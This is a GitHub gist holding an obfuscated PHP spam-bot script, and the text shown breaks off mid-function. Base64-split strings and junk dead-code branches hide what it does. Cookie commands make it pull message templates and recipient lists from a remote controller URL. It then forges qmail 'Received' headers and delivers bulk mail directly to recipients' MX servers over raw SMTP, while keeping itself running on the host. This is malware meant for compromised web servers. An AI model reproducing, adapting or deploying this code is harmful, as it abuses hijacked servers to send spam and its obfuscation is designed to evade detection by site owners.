Created
August 23, 2016 12:16
-
-
Save djneo92nl/9b77e0205b2ef1c0a7016552d6063a1a to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php function _68758598 ($i) { | |
$a = Array('MQ' . '==', 'bW' . 'F4X2V4ZWN' . '1dGlvbl90aW1l', 'b' . '3V' . '0c' . 'H' . 'V' . '0' . 'X2' . 'J1ZmZlcmluZw=' . '=', 'bWVt' . 'b3J' . '5X2' . 'xpbWl0', 'LTE=', 'Lg==', '', 'MA==', '' . 'Olw=', 'O' . 'i8=', 'd2luZG' . '9' . '3c' . 'wo=', 'R' . 'VJ' . 'STk9fRVdPV' . 'UxE' . 'QkxP' . 'Q0s=', '' . 'RVJST' . 'k9f' . 'RUl' . 'OUFJPR1JFU1M=', 'RVJS' . 'T' . 'k9f' . 'RU' . 'FHQUl' . 'O', 'RVJSTk9fR' . 'Vd' . 'P' . 'V' . 'U' . 'xEQkxPQ0s=', 'RVJ' . 'STk9f' . 'RUlO' . 'UFJ' . 'PR1' . 'JFU' . '1M=', 'R' . 'E5TX1N' . 'FUlZFUg==', 'Mj' . 'EyLjIxN' . 'i4x' . 'MTIuMTEy', 'Q1JMRg==', 'DQo=', '', '', '', '', '' . 'c' . 'Gpoc2R3a2hsaWVlbG' . 'xh' . 'aGg' . '=', 'ZW' . 'J' . '6', '' . 'c2luZ2x' . 'l', 'ZW8=', 'Y' . '2' . 'hlY2s=', 'aHR0cDovL3d3dy5' . '5YW5k' . 'ZX' . 'guc' . 'nU' . 'v', 'W0' . 'ZVQ0' . 'sgT' . '0ZGXQ=' . '=', 'W' . '0FMT' . 'CB' . 'PS11bQkxPQ0td', '' . 'c2luZ2xl', 'dGVzdC' . '5' . 'ob3' . 'N0', 'dG' . 'VzdEB5YWhvby5jb20=', '' . 'd' . 'G' . 'VzdE' . 'Bk' . 'b' . '21haW' . '4u' . 'Y29t', 'dGVzdA' . '==', '' . 'W0FM' . 'TCBPS11bU0l' . 'OR0xFXQ==', '' . 'W0' . 'ZV' . 'Q0sgT0Z' . 'GXQ==', 'dXJs', '' . 'd' . 'Hlw' . 'ZQ=' . '=', 'SEVMTE8gQk9' . 'T' . 'U' . 'yBMRV' . 'RTIFRSWSBU' . 'Ty' . 'BXT1JL' . 'Cg' . '==', 'P' . 'Ghy' . 'Pgo=', '' . 'dHlwZQ' . '==', 'YmxvY' . '2s=', 'Ym' . 'xvY' . '2s' . '=', 'YmxvY2s=', '' . 'YmxvY2s=', 'Y' . 'mxvY' . '2s' . '=', 'Y' . 'mxv' . 'Y2s=', '' . 'Ymxv' . 'Y2s' . '=', 'SFRUUF' . '9IT1N' . 'U', '' . 'd' . 'X' . 'Js', 'JnZh' . 'cn' . 'M' . '9MQ' . '==', 'JTx' . 'zdWJq' . 'Z' . 'WN0' . 'PiguKj8pPC9zdWJqZWN' . '0PiVz', 'JTx' . 'ib2R5PiguK' . 'j8' . 'pPC' . '9' . 'ib2R5' . 'PiV' . 'z', 'J' . 'Txmcm9tPiguKj' . '8pPC9m' . 'cm9tPiVz', 'RV' . 'JST' . '1I' . '6MT' . 'AwMgo=', '' . 'DQ' . '==', '', '' . 'bm' . 'Zqan' . 'Zo' . 'c' . 'nRsY' . 'n' . 'FvbG9w' . 'Y' . '3' . 'Ju', 'bno' . '=', 'Cg==', '' . 'bW' . 'Fpb' . 'H' . 'NfbGlz' . 'dCBp' . 'cyBlbXB0eQ' . 'o=', 'R' . 'U9G', 'c2luZ2x' . 'l', '' . 'ZCBNIFkgSDp' . 'p' . 'OnMg' . 'Tw==', 'R' . 'G' . 'F0ZT' . 'og', 'ZCBNIFk' . 'gS' . 'Dp' . 'p' . 'O' . 'n' . 'MgTw==', 'TW' . 'Vzc2' . 'F' . 'nZ' . 'S' . '1JRDogPA==', 'W' . 'W' . '1kSGlz', '' . 'P' . 'g==', 'U3' . 'V' . 'iamVj' . 'dDog', 'TUlNRS1WZXJz' . 'aW9' . 'uO' . 'iAxLjA=', 'cXNt', 'Q29' . 'u' . 'd' . 'GVudC1UeX' . 'B' . 'lOiB0ZXh' . '0L2h0b' . 'Ww' . '7' . 'IGNoYXJ' . 'zZ' . 'XQ9Im' . 'lzby04ODU5LT' . 'Ei', 'Q' . '29udGVu' . 'dC1' . 'U' . 'cmFu' . 'c2Z' . 'lci1Fbm' . 'NvZ' . 'GluZzogO' . 'GJ' . 'p' . 'd' . 'A==', 'WC1Qcmlvcml0' . 'eTogM' . 'w' . '==', 'cXI=', '' . 'L' . 'g==', 'ZWZrdnBwaW' . '1ucGV' . 'qcnA=', 'Ymx' . 'n' . 'eg' . '==', 'RVJS' . 'T1I6MTAwMw' . 'o' . '=', 'RV' . 'JST1I6MTA' . 'wNAo=', '', '' . 'YWxsb3dfdXJsX' . '2' . 'ZvcGV' . 'u', '' . 'cg' . '==', '' . 'aG9' . 'z' . 'dA==', 'aG9zdA==', 'cGF0' . 'aA==', 'cX' . 'Vlcnk=', 'Pw' . '==', 'cXVlcnk=', 'O' . 'DQuMT' . 'YuMjMwLjQ4', 'Kg0KV' . 'X' . 'Nlc' . 'i1' . 'BZ2VudDogQ2xpZW' . '50' . 'I' . 'HYyLj' . 'ANCkNvbm5lY3R' . 'p' . 'b246' . 'IGNsb3Nl' . 'D' . 'QoNCg=' . '=', '', 'dH' . 'Jhbn' . 'N' . 'mZXI' . 'tZ' . 'W5jb2R' . 'pbmc=', 'Y2h1bm' . 'tlZA==', '', '', 'Cg==', '', 'd3E=', 'aWs=', 'IA==', 'UVV' . 'JV' . 'A' . '==', '', 'QA==', 'dWU=', 'NjAw', '' . 'UVVJVA==', 'TU' . 'FJTC' . 'BGUk9N' . 'Ojw=', 'P' . 'g' . '=' . '=', 'UkNQVCB' . 'UTzo' . '8', 'Pg==', '' . 'R' . 'EFU' . 'QQ==', 'DQ==', '', 'Cg==', 'MA==', 'OQ==', '' . 'Lg==', 'QA==', '' . 'QA' . '==', 'bnB1' . 'Z' . '21n' . 'Z' . '2h' . 'hYm' . 'tkZm' . 'c=', '' . 'aHo=', 'QA==', 'Y2' . '9u' . 'bg==', 'dHJ5', 'bXh' . 'fb' . 'nVt', 'bX' . 'hfaXB' . 'z', 'c' . '3R' . 'lcA==', '' . 'Y' . 'WR' . 'kc' . 'mVzcw==', '' . 'cmVj' . 'd' . 'l9idWY=', '', 'cm' . 'V' . 'j' . 'dl' . '9' . 'sZW4=', 'c2V' . 'uZF9' . 'idWY' . '=', '', 'c2VuZF' . '9sZW4=', '' . 'cmV0', 'a' . 'Gpt', 'c' . 'mV0', 'Y29ub' . 'g==', 'c' . '3RlcA=' . '=', 'c3' . 'RlcA==', 'Y29ubg' . '==', 'Y2' . '9ubg==', '' . 'eGM' . '=', 'Y29ub' . 'g==', 'Y29ubg==', 'Y29ub' . 'g=' . '=', '' . 'Y' . '29ubg==', 'c29ja' . '2V0X3' . 'NlbGVj' . 'dCB' . 's' . 'YXN' . '0IGVyc' . 'm9yID0g', 'Cg==', 'c2V' . 'sZ' . 'W' . 'N0IHRpbWVvdX' . 'QgYW5' . 'kIG' . 'V4' . 'aXQgZXJybm8' . '6IA=' . '=', 'C' . 'g==', 'dHJ5', '', 'c29j' . 'a2V0X3JlY3Y' . 'gbGFzd' . 'CBlcnJvci' . 'A9' . 'IA==', 'Cg' . '=' . '=', 'ZHc=', 'cmV' . 'j' . 'd' . 'l9idWY' . '=', 'amtv', 'cmVjdl9' . 'sZW4=', '', 'cmVjdl9sZW' . '4' . '=', 'cm' . 'V' . 'jd' . 'l9' . 'idWY=', 'Cg' . '==', '' . 'cmVjdl9idW' . 'Y=', '' . 'c' . 'mV' . 'jdl' . '9i' . 'dW' . 'Y=', 'cmVj' . 'd' . 'l9i' . 'dWY=', 'cmVjdl9s' . 'ZW4=', 'I' . 'A==', 'c3RlcA==', 'Y2' . '9ubg==', 'cmV0', 'c2V' . 'uZF9idWY=', '' . 'c2VuZF9sZW4=', 'c' . '3Rlc' . 'A==', 'b' . 'mw=', 'c2' . 'VuZF9idWY=', 'TUF' . 'JTCB' . 'G' . 'Uk' . '9NOj' . 'w=', 'Pg' . '==', 'c2' . 'VuZF9sZW' . '4=', 'c3RlcA==', '' . 'Znh' . 'kZX' . 'Z' . 'taH' . 'dy' . 'cmF' . 's', 'dW' . 'Zweg==', 'ZmFv' . 'd2' . 'lsZXRw' . 'YnhqY' . 'n' . 'BveA=' . '=', 'dno=', 'c2VuZ' . 'F' . '9idWY=', 'U' . 'k' . 'NQVCBUTzo8', 'YWRk' . 'cmVzcw' . '=' . '=', 'Pg==', 'c2Vu' . 'Z' . 'F' . '9sZW4=', 'c3RlcA==', 'c' . '2VuZF9idWY=', 'RE' . 'FUQQ=' . '=', 'c2VuZF' . '9sZW4=', '' . 'c3Rlc' . 'A' . '==', 'ZCBN' . 'IFkgS' . 'DppOnMgT' . 'w==', 'RGF0' . 'Z' . 'T' . 'o' . 'g', 'Z' . 'CBNIFk' . 'gSD' . 'ppOnMgTw==', 'TW' . 'Vzc2Fn' . 'ZS' . '1JRDog' . 'PA==', '' . 'WW1' . 'kS' . 'Glz', '' . 'Pg==', 'U3' . 'Via' . 'm' . 'VjdDog', 'TUlNRS1W' . 'ZXJzaW9' . 'uOiAxLj' . 'A=', 'Q29udGVudC' . '1UeXBlOiB0' . 'ZXh0L' . '2h0bWw7IGN' . 'oYXJzZXQ9I' . 'm' . 'l' . 'zby04O' . 'DU5LTEi', 'Q29u' . 'dGVudC1Uc' . 'mFuc2' . 'Zlci1Fbm' . 'N' . 'vZ' . 'Gl' . 'uZzogOGJpdA==', 'VG86IA==', 'YW' . 'R' . 'k' . 'cmVz' . 'cw==', '' . 'Y' . 'Q==', 'WC' . '1Q' . 'c' . 'mlvcm' . 'l0eT' . 'o' . 'gMw=' . '=', '' . 'L' . 'g==', 'c2Vu' . 'ZF9idWY=', 'c2Vu' . 'Z' . 'F9sZW4=', '' . 'c3' . 'R' . 'lcA' . '=' . '=', 'Y29ub' . 'g==', 'cmV0', 'dH' . 'J5', 'c3RlcA==', 'c3RlcA==', 'c' . '3RlcA==', 'c' . '2VuZF9i' . 'dWY=', 'c2VuZF9s' . 'ZW' . '4=', 'c29j' . 'a' . '2V' . '0X3Nl' . 'bmQ' . 'gbGFzdCB' . 'lcnJvciA9IA' . '=' . '=', 'Cg' . '==', 'cG5qY' . 'Xd1' . 'YWtpd3Z1cWM=', '' . 'd' . 'n' . 'hteg==', '' . 'c' . '2VuZF9s' . 'ZW4=', 'c2VuZF9idWY=', '' . 'c' . '2' . 'VuZF9sZ' . 'W4=', 'c3' . 'RlcA==', 'cmVj' . 'd' . 'l9id' . 'WY=', '', 'cmVj' . 'd' . 'l9s' . 'ZW4=', '' . 'cmV0', 'Y' . '29' . 'ubg==', 'Y29ubg==', '' . 'Y29ubg==', 'c3' . 'RlcA' . '==', 'bX' . 'hf' . 'b' . 'nV' . 't', 'bXhf' . 'bnVt', 'bXhfa' . 'XBz', 'Y29ubg' . '==', 'cmV' . '0', '' . 'b' . 'XhfbnV' . 't', 'bXhf' . 'aXBz', 'Y29ubg==', 'Y29ubg' . '==', 'cm' . 'V0', 'c' . '3Rl' . 'cA' . '==', 'Cg==', '' . 'a' . 'GQ=', 'ZGVmY' . 'XVsdF9zb2Nr' . 'ZXR' . 'fd' . 'G' . 'ltZ' . 'W9' . '1' . 'd' . 'A==', 'aWtkaW' . 'RtYmF' . '0aHF2', 'cGJhZ3o=', 'dm10c' . 'Xdn' . 'ZnN3Y291ZmVw' . 'c2Nv', 'bnd6', 'dGd0ZH' . 'h2c3ZzdndrY' . '2xxcHhyY' . 'W' . '4=', 'dW' . '96', '' . 'Lg==', '' . 'L' . 'g==', 'Lg==', '', '' . 'b' . '21' . 'tYm1' . '1bXFo' . 'bmJzZ' . 'HA=', 'b3N6', '', 'Lg==', 'Lg=' . '=', 'Lg==', '', 'Lg==', 'bG9n' . 'LnR4' . 'dA=' . '=', 'Y' . 'Ss='); | |
return base64_decode($a[$i]); | |
} ?><?php @ignore_user_abort(_68758598(0)); | |
if ((round(0 + 627.66666666667 + 627.66666666667 + 627.66666666667) ^ round(0 + 1883)) && fsockopen($_0)) ucfirst($_1); | |
@set_time_limit(round(0)); | |
@ini_set(_68758598(1), false); | |
@ini_set(_68758598(2), false); | |
@ini_set(_68758598(3), _68758598(4)); | |
if (round(0 + 3193.5 + 3193.5) < mt_rand(round(0 + 763 + 763 + 763), round(0 + 4093))) strrpos($_2, $_2); | |
@error_reporting(30719); | |
while (round(0 + 1082.5 + 1082.5 + 1082.5 + 1082.5) - round(0 + 2165 + 2165)) l__10($_3); | |
$_4 = str_replace(_68758598(5), _68758598(6), phpversion()); | |
if ((round(0 + 591.66666666667 + 591.66666666667 + 591.66666666667) ^ round(0 + 443.75 + 443.75 + 443.75 + 443.75)) && fileatime($_0)) strnatcmp($_5); | |
if (strlen($_4) < round(0 + 1.5 + 1.5)) while (strlen($_4) < round(0 + 1.5 + 1.5)) $_4 .= _68758598(7); | |
if (intval($_4) < round(0 + 410)) { | |
$_POST =& $HTTP_POST_VARS; | |
$_GET =& $HTTP_GET_VARS; | |
$_SERVER =& $HTTP_SERVER_VARS; | |
$_COOKIE =& $HTTP_COOKIE_VARS; | |
} | |
$_6 = getcwd(); | |
if (strpos($_6, _68758598(8)) !== false || strpos($_6, _68758598(9)) !== false) { | |
echo _68758598(10); | |
define(_68758598(11), round(0 + 10035)); | |
define(_68758598(12), round(0 + 10036)); | |
} else { | |
define(_68758598(13), round(0 + 11)); | |
$_7 = round(0 + 169 + 169 + 169); | |
define(_68758598(14), ERRNO_EAGAIN); | |
define(_68758598(15), round(0 + 115)); | |
} | |
define(_68758598(16), _68758598(17)); | |
if ((round(0 + 1266.6666666667 + 1266.6666666667 + 1266.6666666667) + round(0 + 420.5 + 420.5)) > round(0 + 3800) || explode($_8, $_9, $_10)) ; else { | |
socket_getpeername($_11, $_12); | |
} | |
define(_68758598(18), _68758598(19)); | |
while (round(0 + 753 + 753 + 753 + 753) - round(0 + 753 + 753 + 753 + 753)) array_key_exists($_6, $_13); | |
$_14 = _68758598(20); | |
while (round(0 + 2927) - round(0 + 585.4 + 585.4 + 585.4 + 585.4 + 585.4)) mssql_query($_15, $_16, $_17); | |
$_18 = _68758598(21); | |
$_19 = _68758598(22); | |
if ((round(0 + 682.66666666667 + 682.66666666667 + 682.66666666667) ^ round(0 + 409.6 + 409.6 + 409.6 + 409.6 + 409.6)) && array_merge($_20, $_21, $_0)) socket_send($_22, $_23, $_24, $_25); | |
$_26 = _68758598(23); | |
$_27 = round(0); | |
if (strpos(_68758598(24), _68758598(25)) !== false) ob_clean($_28, $_29, $_11, $_30); | |
$_31 = round(0); | |
$_32 = _68758598(26); | |
if ((round(0 + 1971.5 + 1971.5) + round(0 + 1917.5 + 1917.5)) > round(0 + 3943) || crc32($_33, $HTTP_GET_VARS, $_34, $_35, $_31)) ; else { | |
urlencode($_36); | |
} | |
$_8 = round(0 + 3.3333333333333 + 3.3333333333333 + 3.3333333333333); | |
srand(time()); | |
$_37 = _68758598(27); | |
if (isset($_COOKIE[_68758598(28)])) { | |
$_38 = l__0(_68758598(29)); | |
if (empty($_38)) exit(_68758598(30)); | |
if (function_exists('socket_select')) { | |
$_39 = array("test@yahoo.com", "test@aol.com", "test@hotmail.com"); | |
$_40 = l__5($_39, true); | |
if ($_40[round(0)] > round(0)) exit(_68758598(31)); | |
} | |
if ($_32 === _68758598(32) && function_exists('getmxrr') && function_exists('gethostbynamel')) { | |
if (round(0 + 250) == l__3(_68758598(33), _68758598(34), _68758598(35), _68758598(36), true)) exit(_68758598(37)); | |
} | |
exit(_68758598(38)); | |
} | |
if (isset($_COOKIE[_68758598(39)]) && isset($_COOKIE[_68758598(40)])) { | |
echo _68758598(41); | |
echo _68758598(42); | |
if ($_COOKIE[_68758598(43)] == _68758598(44)) { | |
$_32 = _68758598(45); | |
$_8 = round(0 + 25 + 25); | |
if (isset($_COOKIE[_68758598(46)]) && is_numeric($_COOKIE[_68758598(47)]) && $_COOKIE[_68758598(48)] > round(0) && $_COOKIE[_68758598(49)] <= round(0 + 200)) $_8 = $_COOKIE[_68758598(50)]; | |
} | |
$_26 = $_SERVER[_68758598(51)]; | |
$_41 = gethostbyname($_26); | |
if (l__4($_41)) { | |
$_3 = gethostbyaddr($_41); | |
if (!l__4($_3)) $_26 = $_3; | |
} | |
$_42 = stripslashes($_COOKIE[_68758598(52)]) . $_8; | |
$_43 = l__0($_42 . _68758598(53)); | |
(round(0 + 751.4 + 751.4 + 751.4 + 751.4 + 751.4) - round(0 + 939.25 + 939.25 + 939.25 + 939.25) + round(0 + 907.75 + 907.75 + 907.75 + 907.75) - round(0 + 1815.5 + 1815.5)) ? array_merge($_44, $_21) : mt_rand(round(0 + 356.25 + 356.25 + 356.25 + 356.25), round(0 + 1252.3333333333 + 1252.3333333333 + 1252.3333333333)); | |
if (preg_match(_68758598(54), $_43, $_45) && preg_match(_68758598(55), $_43, $_46) && preg_match(_68758598(56), $_43, $_47)) { | |
$_14 = $_45[round(0 + 0.5 + 0.5)]; | |
$_19 = $_46[round(0 + 0.5 + 0.5)]; | |
$_18 = $_47[round(0 + 0.25 + 0.25 + 0.25 + 0.25)]; | |
unset($_47, $_46, $_45); | |
if (round(0 + 1367.5 + 1367.5 + 1367.5 + 1367.5) < mt_rand(round(0 + 323 + 323), round(0 + 4819))) l__4($_48, $_49); | |
} else exit(_68758598(57)); | |
(round(0 + 683.5 + 683.5 + 683.5 + 683.5) - round(0 + 683.5 + 683.5 + 683.5 + 683.5) + round(0 + 762.2 + 762.2 + 762.2 + 762.2 + 762.2) - round(0 + 3811)) ? array_merge($_50) : mt_rand(round(0 + 401.75 + 401.75 + 401.75 + 401.75), round(0 + 683.5 + 683.5 + 683.5 + 683.5)); | |
$_51 = time(); | |
$_52 = round(0); | |
$_53 = false; | |
$_21 = round(0); | |
$_54 = round(0); | |
while (!$_53) { | |
$_55 = l__0($_42 . "&g=$_21&b=$_54"); | |
if (round(0 + 5545) < mt_rand(round(0 + 358.66666666667 + 358.66666666667 + 358.66666666667), round(0 + 1488 + 1488 + 1488))) session_get_cookie_params($_56); | |
$_21 = round(0); | |
$_54 = round(0); | |
if ((round(0 + 691.25 + 691.25 + 691.25 + 691.25) ^ round(0 + 553 + 553 + 553 + 553 + 553)) && array_map($_57, $_28, $_51)) strspn($_29, $_31, $_58, $_59); | |
if (!strlen($_55)) { | |
echo "bad emails: $_55\n"; | |
break; | |
} | |
$_55 = str_replace(_68758598(58), _68758598(59), $_55); | |
if (strpos(_68758598(60), _68758598(61)) !== false) unpack($_60, $_45, $_61, $_33); | |
$_5 = explode(_68758598(62), $_55); | |
if (!count($_5)) { | |
echo _68758598(63); | |
break; | |
} | |
$_62 = count($_5); | |
if ((round(0 + 722.8 + 722.8 + 722.8 + 722.8 + 722.8) + round(0 + 418 + 418)) > round(0 + 1807 + 1807) || strval($_26, $_41, $_51, $_13)) ; else { | |
strnatcmp($_5, $_63, $_64); | |
} | |
if (strlen($_5[$_62 - round(0 + 1)]) == round(0)) { | |
array_splice($_5, -round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)); | |
$_62--; | |
} | |
if (strpos($_5[$_62 - round(0 + 0.5 + 0.5)], _68758598(64)) !== false) { | |
array_splice($_5, -round(0 + 0.25 + 0.25 + 0.25 + 0.25)); | |
$_62--; | |
$_53 = true; | |
} | |
if ($_32 === _68758598(65)) { | |
$_48 = rand(round(0 + 333.33333333333 + 333.33333333333 + 333.33333333333), round(0 + 59000)); | |
$_12 = rand(round(0 + 500 + 500), round(0 + 29500 + 29500)); | |
$_65 = "Received: (qmail $_48 invoked by uid $_12); " . gmdate(_68758598(66)) . CRLF; | |
$_65 .= _68758598(67) . gmdate(_68758598(68)) . CRLF; | |
if ((round(0 + 786.5 + 786.5 + 786.5 + 786.5) + round(0 + 1626.3333333333 + 1626.3333333333 + 1626.3333333333)) > round(0 + 3146) || socket_select($_56)) ; else { | |
pack($_43, $_36, $_66); | |
} | |
$_65 .= _68758598(69) . gmdate(_68758598(70)) . ".$_48.qmail@" . $_26 . _68758598(71) . CRLF; | |
$_65 .= _68758598(72) . $_14 . CRLF; | |
(round(0 + 347 + 347) - round(0 + 231.33333333333 + 231.33333333333 + 231.33333333333) + round(0 + 451.25 + 451.25 + 451.25 + 451.25) - round(0 + 601.66666666667 + 601.66666666667 + 601.66666666667)) ? substr_replace($_67) : mt_rand(round(0 + 347 + 347), round(0 + 1016 + 1016 + 1016)); | |
$_65 .= "Reply-To: $_18" . CRLF; | |
(round(0 + 1935.5 + 1935.5) - round(0 + 1935.5 + 1935.5) + round(0 + 1178.5 + 1178.5 + 1178.5 + 1178.5) - round(0 + 4714)) ? strnatcmp($_19) : mt_rand(round(0 + 665.2 + 665.2 + 665.2 + 665.2 + 665.2), round(0 + 3871)); | |
$_65 .= _68758598(73) . CRLF; | |
$_68 = _68758598(74); | |
$_65 .= _68758598(75) . CRLF; | |
$_65 .= _68758598(76) . CRLF; | |
$_65 .= "From: <$_18>" . CRLF; | |
(round(0 + 3943) - round(0 + 985.75 + 985.75 + 985.75 + 985.75) + round(0 + 410.33333333333 + 410.33333333333 + 410.33333333333) - round(0 + 615.5 + 615.5)) ? ord($_1, $_69, $_70, $_33, $_31) : mt_rand(round(0 + 185.5 + 185.5 + 185.5 + 185.5), round(0 + 3943)); | |
$_65 .= "To: $_69" . CRLF; | |
$_71 = round(0 + 3661); | |
$_65 .= _68758598(77) . CRLF; | |
$_72 = _68758598(78); | |
$_65 .= CRLF; | |
if (round(0 + 1519.2 + 1519.2 + 1519.2 + 1519.2 + 1519.2) < mt_rand(round(0 + 856.25 + 856.25 + 856.25 + 856.25), round(0 + 4166))) mktime($_73, $_74); | |
$_65 .= $_19 . CRLF; | |
$_65 .= CRLF . _68758598(79) . CRLF; | |
$_75 = round(0 + 449 + 449 + 449); | |
foreach ($_5 as $_69) if (round(0 + 83.333333333333 + 83.333333333333 + 83.333333333333) == l__3($_26, $_69, $_18, $_65)) $_21++; else $_54++; | |
$_27 += $_21; | |
$_31 += $_54; | |
if (strpos(_68758598(80), _68758598(81)) !== false) strrpos($HTTP_SERVER_VARS); | |
if ($_52 >= round(0 + 2.5 + 2.5 + 2.5 + 2.5)) { | |
if ($_27 == round(0)) exit(_68758598(82)); else $_52 = round(0); | |
} else $_52++; | |
} else { | |
$_40 = l__5($_5); | |
if ((round(0 + 180.2 + 180.2 + 180.2 + 180.2 + 180.2) + round(0 + 2580)) > round(0 + 450.5 + 450.5) || sha1($_76, $_35)) ; else { | |
crc32($_32, $_77, $HTTP_SERVER_VARS); | |
} | |
$_21 = $_40[round(0)]; | |
$_54 = $_40[round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)]; | |
if ((round(0 + 647.5 + 647.5) ^ round(0 + 323.75 + 323.75 + 323.75 + 323.75)) && imagedestroy($_52, $_78)) prev($_44, $_36, $_79); | |
$_27 += $_21; | |
if ((round(0 + 1160 + 1160 + 1160 + 1160) + round(0 + 843.5 + 843.5)) > round(0 + 1546.6666666667 + 1546.6666666667 + 1546.6666666667) || socket_get_option($HTTP_SERVER_VARS, $_51, $_80)) ; else { | |
copy($_52, $_10, $_29, $_81); | |
} | |
$_31 += $_54; | |
if ($_21 == round(0)) exit(_68758598(83)); | |
} | |
} | |
exit("GOOD: $_27 BAD: $_31\n"); | |
} | |
function l__0 ($_42) { | |
$_70 = _68758598(84); | |
if (function_exists('curl_init')) { | |
$_82 = curl_init($_42); | |
curl_setopt($_82, round(0 + 19913), round(0 + 0.33333333333333 + 0.33333333333333 + 0.33333333333333)); | |
$_76 = curl_exec($_82); | |
if (!curl_errno($_82)) $_70 = $_76; | |
curl_close($_82); | |
} | |
if (empty($_70) && function_exists('ini_get') && ini_get(_68758598(85))) { | |
$_30 = @fopen($_42, _68758598(86)); | |
if (is_resource($_30)) { | |
stream_set_timeout($_30, round(0 + 0.6 + 0.6 + 0.6 + 0.6 + 0.6)); | |
while (!feof($_30)) $_70 .= @fgets($_30, round(0 + 1365.3333333333 + 1365.3333333333 + 1365.3333333333)); | |
fclose($_30); | |
} | |
} | |
if (empty($_70) && function_exists('fsockopen')) { | |
$_83 = @parse_url($_42); | |
if (!isset($_83[_68758598(87)])) return $_70; | |
$_26 = $_83[_68758598(88)]; | |
$_84 = $_83[_68758598(89)]; | |
if (isset($_83[_68758598(90)])) $_84 .= _68758598(91) . $_83[_68758598(92)]; | |
if ($_26 === ($_49 = gethostbyname($_26))) $_49 = _68758598(93); | |
$_85 = "GET $_84 HTTP/1.1\r\nHost: $_26\r\nAccept: */" . _68758598(94); | |
for ($_86 = round(0); $_86 < round(0 + 3); $_86++) if (is_resource($_30 = fsockopen($_49, round(0 + 16 + 16 + 16 + 16 + 16), $_87, $_34, round(0 + 0.33333333333333 + 0.33333333333333 + 0.33333333333333)))) break; | |
if (is_resource($_30)) { | |
$_88 = false; | |
fwrite($_30, $_85); | |
while (!feof($_30)) { | |
$_89 = strtolower(trim(fgets($_30, round(0 + 341.33333333333 + 341.33333333333 + 341.33333333333)))); | |
if ($_89 == _68758598(95)) break; elseif (!$_88 && @strpos($_89, _68758598(96)) !== false && @strpos($_89, _68758598(97)) !== false) $_88 = true; | |
} | |
$_70 = _68758598(98); | |
$_90 = round(0 + 1004 + 1004 + 1004); | |
while (!feof($_30)) $_70 .= @fgets($_30, round(0 + 1024) * round(0 + 42.666666666667 + 42.666666666667 + 42.666666666667)); | |
if ((round(0 + 3180) + round(0 + 1900.5 + 1900.5)) > round(0 + 795 + 795 + 795 + 795) || popen($_60, $_17, $_65, $_35)) ; else { | |
DNS_SERVER($_76); | |
} | |
fclose($_30); | |
if ($_88) { | |
$_91 = _68758598(99); | |
$_59 = NULL; | |
while (true) { | |
$_92 = @strpos($_70, _68758598(100)); | |
if (!($_92 === false) && $_59 === NULL) { | |
$_59 = hexdec(substr($_70, round(0), $_92)); | |
$_91 .= substr($_70, $_92 + round(0 + 0.5 + 0.5), $_59); | |
$_70 = substr($_70, ($_92 + round(0 + 0.25 + 0.25 + 0.25 + 0.25)) + $_59); | |
$_59 = NULL; | |
} else { | |
break; | |
} | |
} | |
$_70 = $_91; | |
} | |
} | |
} | |
return $_70; | |
if ((round(0 + 1323 + 1323) ^ round(0 + 2646)) && unlink($_SERVER, $_84, $_16)) flush($_93, $_69); | |
} | |
function l__1 ($_94) { | |
$_95 = _68758598(101); | |
$_96 = _68758598(102); | |
while ($_97 = @fgets($_94, round(0 + 341.33333333333 + 341.33333333333 + 341.33333333333))) { | |
$_95 .= $_97; | |
$_98 = _68758598(103); | |
if (substr($_97, round(0 + 0.75 + 0.75 + 0.75 + 0.75), round(0 + 0.5 + 0.5)) == _68758598(104)) { | |
break; | |
} | |
} | |
return $_95; | |
} | |
function l__2 ($_99, $_20, $_73, &$_100) { | |
fwrite($_99, $_20); | |
$_28 = l__1($_99); | |
$_100 = substr($_28, round(0), round(0 + 3)); | |
if ((round(0 + 3444) ^ round(0 + 1722 + 1722)) && array_diff_ukey($_89, $_50)) fileatime($_101, $_77); | |
$_24 = false; | |
if (is_array($_73)) { | |
foreach ($_73 as $_10) if (intval($_100) == intval($_10)) { | |
$_24 = true; | |
break; | |
} | |
} else if (intval($_73) == intval($_100)) $_24 = true; | |
if (!$_24) { | |
fwrite($_99, _68758598(105) . CRLF); | |
l__1($_99); | |
fclose($_99); | |
} | |
return $_24; | |
$_102 = round(0 + 3722); | |
} | |
$_103 = array(); | |
function l__3 ($_50, $_104, $_105, $_95, $_106 = false) { | |
global $_103; | |
if ((round(0 + 981.5 + 981.5) + round(0 + 2602)) > round(0 + 981.5 + 981.5) || array_splice($_1, $_95, $_70)) ; else { | |
fflush($_107, $_54, $_46, $_108, $_109); | |
} | |
$_110 = round(0 + 1.6666666666667 + 1.6666666666667 + 1.6666666666667); | |
$_100 = _68758598(106); | |
if ((round(0 + 579.2 + 579.2 + 579.2 + 579.2 + 579.2) + round(0 + 705 + 705 + 705 + 705 + 705)) > round(0 + 1448 + 1448) || flush($_111, $_14)) ; else { | |
crc32($_66, $_106, $_76); | |
} | |
list($_112, $_64) = explode(_68758598(107), $_104); | |
$_113 = array(); | |
$_57 = array(); | |
if ((round(0 + 873.66666666667 + 873.66666666667 + 873.66666666667) ^ round(0 + 655.25 + 655.25 + 655.25 + 655.25)) && strtotime($_33, $_76, $_114, $_115, $_63)) array_pop($HTTP_COOKIE_VARS, $_29, $_26); | |
if (!isset($_103{$_64})) { | |
getmxrr($_64, $_113); | |
foreach ($_113 as $_61) { | |
if (FALSE !== ($_77 = gethostbynamel($_61))) $_57 = array_merge($_57, $_77); | |
} | |
if (count($_57) > round(0)) $_103{$_64} = $_57; | |
} else $_57 = $_103{$_64}; | |
foreach ($_57 as $_116) { | |
$_117 = $_116; | |
if ((round(0 + 715.2 + 715.2 + 715.2 + 715.2 + 715.2) ^ round(0 + 894 + 894 + 894 + 894)) && mssql_result($_17, $_81)) mysql_close($_118, $_88); | |
$_79 = @fsockopen($_117, round(0 + 5 + 5 + 5 + 5 + 5), $_87, $_34, $_110); | |
$_119 = _68758598(108); | |
if (empty($_79)) { | |
$_100 = _68758598(109); | |
continue; | |
} | |
$_111 = l__1($_79); | |
if (round(0 + 2730 + 2730) < mt_rand(round(0 + 651.5 + 651.5 + 651.5 + 651.5), round(0 + 949.66666666667 + 949.66666666667 + 949.66666666667))) chr($_104); | |
if ($_106) { | |
fwrite($_79, _68758598(110) . CRLF); | |
l__1($_79); | |
fclose($_79); | |
